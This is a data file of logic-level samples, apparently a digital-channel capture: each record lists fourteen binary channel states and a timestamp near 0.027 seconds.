1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783680e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783804e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783828e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783856e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783880e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783908e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783932e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784028e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784056e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784180e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784204e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784228e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784256e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784280e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784308e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784380e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784428e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784456e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784480e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784628e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6784780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6784804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6909244e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6909424e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6909444e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,2.6909472e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6909500e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.6909788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6909812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,2.6909820e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,2.6909860e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,2.6909884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6909892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.6909912e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6909936e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.6909988e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6910012e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.6910036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.6910060e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,2.6910068e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910076e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6910112e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910136e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910144e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910164e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,2.6910188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910192e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6910236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910268e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910336e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910460e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910468e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6910512e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910536e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910544e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910564e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,2.6910588e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910592e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6910636e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910660e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6910684e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910712e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910716e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910736e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910860e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910868e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6910912e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910936e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6910944e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6910964e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,2.6910988e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6910992e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911036e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911068e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911112e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911136e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911164e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911188e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911212e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911216e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911260e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911312e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911336e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911344e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911364e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911388e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911436e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911484e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911492e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911512e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911536e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911564e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911588e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911612e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911644e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911736e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911764e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911816e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6911860e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6911884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911912e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911936e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6911964e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6911988e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912036e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,2.6912040e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912044e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6912060e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912112e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912136e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912140e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6912188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912212e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6912236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912268e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912312e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912408e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912412e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6912460e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912492e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912508e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912532e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912540e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6912584e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912608e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912616e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912756e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912764e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6912812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912836e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,2.6912840e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912844e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912860e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912884e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912908e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912932e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6912956e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6912984e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6912988e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6913036e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6913060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913068e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913208e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6913212e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.6913236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.6913260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913268e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913612e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913712e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913756e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6913956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6913984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914408e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914756e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914808e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6914956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6914984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915408e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915756e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915808e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6915956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6915984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916412e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.6916532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.6916556e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7041148e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7041380e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,2.7041404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7041436e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,2.7041724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7041752e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.7041756e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,2.7041800e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.7041824e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7041832e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,2.7041852e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,1,2.7041876e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.7041880e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,2.7041924e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.7041948e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.7041956e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,2.7041972e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7041980e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7041996e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042004e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7042052e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042084e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042100e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042124e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.7042128e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042132e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7042172e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042200e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.7042204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042208e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042224e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042248e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042300e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042372e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042396e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042404e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7042452e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042476e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.7042480e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042484e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042524e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.7042528e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042532e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.7042572e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.7042600e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042604e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042624e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042648e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.7042748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.7042772e-02 